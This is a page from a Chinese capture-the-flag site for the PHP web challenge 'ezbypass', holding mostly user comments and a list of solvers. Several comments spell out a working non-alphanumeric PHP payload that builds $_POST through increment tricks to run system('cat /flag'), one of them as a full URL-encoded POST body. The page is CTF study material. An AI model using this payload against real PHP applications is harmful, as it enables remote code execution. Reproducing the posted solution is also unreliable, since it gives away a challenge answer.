ezbypassWEB 未解决

分数: 25 金币: 4
题目作者: XHH1H
一  血: volcano
一血奖励: 5金币
解  决: 749
提  示:
描  述:
flag{}
评论
店晓贰 2月前

请教大佬各问题:为啥只能用脚本提交,BP和hackbar都不行

回复 0
fi1y 29天前

自增部分使用url编码,不然解析会出错

回复 0

下辈子一定学会 2月前

在控制台做的,参考了评论写的payload:$_=(_/_._)[_];$__=++$_;++$_;$__=_.$_.$__;++$_;++$_;$__.=++$_;$__.=++$_;$$__[_]($$__[__]);剩下的构造表单数据和发送 POST请求你们自己写吧

回复 0

鲲中霸王 8月前

code=$_=(_/_._)[_];$__=%2B%2B$_;%2B%2B$_;$__=_.$_.$__;%2B%2B$_;%2B%2B$_;$__.=%2B%2B$_;$__.=%2B%2B$_;$$__[_]($$__[__]);&_= system&__=cat /flag

回复 2

lzhh530393027 9月前

看懂解析了,但是再做一次也不会

回复 0

jiubanyipeng 1年前

脚本参考:https://www.jiubanyipeng.com/1851.html

回复 2

Jiafeng 1年前

我去,属于知道思路,但是不敢实践的题目;(无数子字母RCE)

回复 0

小丁小丁少发神经 1年前

求问为啥设计成system和cat /flag用两个参数传,为什么不可以构造出$_POST[_]然后赋值_=system(cat /flag)呢(验证一下确实不行,但是不懂为啥)

回复 0
shingu 1年前

我也有个疑问。我花了好几个小时去研究,但也是一知半解。目前得到的答案是:`$$_[_]` 等价于 `${$_POST['_']}`,即用 `$_POST['_']` 的值作为变量名。如果使用`_=system(cat /flag)`,PHP会尝试访问名为 `$system('cat /flag')` 的变量,这显然非法,所以行不通。

回复 0

不会写代码的菜鸟 2年前

这道题完全不是我能做的,有答案也看不懂

回复 1

modeng 2年前

以下是我的思路与总结,希望对你有所帮助https://blog.csdn.net/m_de_g/article/details/138110100?spm=1001.2014.3001.5501

回复 5
Jiafeng 1年前

牛逼,可以直接造出N字符,那就好搞了;

回复 0

hutiaan 2年前

难,为了难而难

回复 1

WriteUp

image
Jesen

2 金币

评分(4)

解题动态

serena7780 攻破了该题 21小时前
青春小豆 攻破了该题 2天前
resonates 攻破了该题 8天前
风掠 攻破了该题 9天前
xong_bai 攻破了该题 10天前
lover 攻破了该题 11天前
saku688 攻破了该题 14天前
afeer123 攻破了该题 14天前
momomowang 攻破了该题 14天前
FanHuaJie 攻破了该题 14天前
mechatengo 攻破了该题 14天前
nihao123@ 攻破了该题 17天前
无敌霸王龙 攻破了该题 18天前
wangjing6715 攻破了该题 19天前
simho-agent 攻破了该题 21天前
lllinux 攻破了该题 22天前
Brightt 攻破了该题 23天前
1781****263 攻破了该题 24天前
luo157 攻破了该题 26天前
rudy1899 攻破了该题 27天前
问题反馈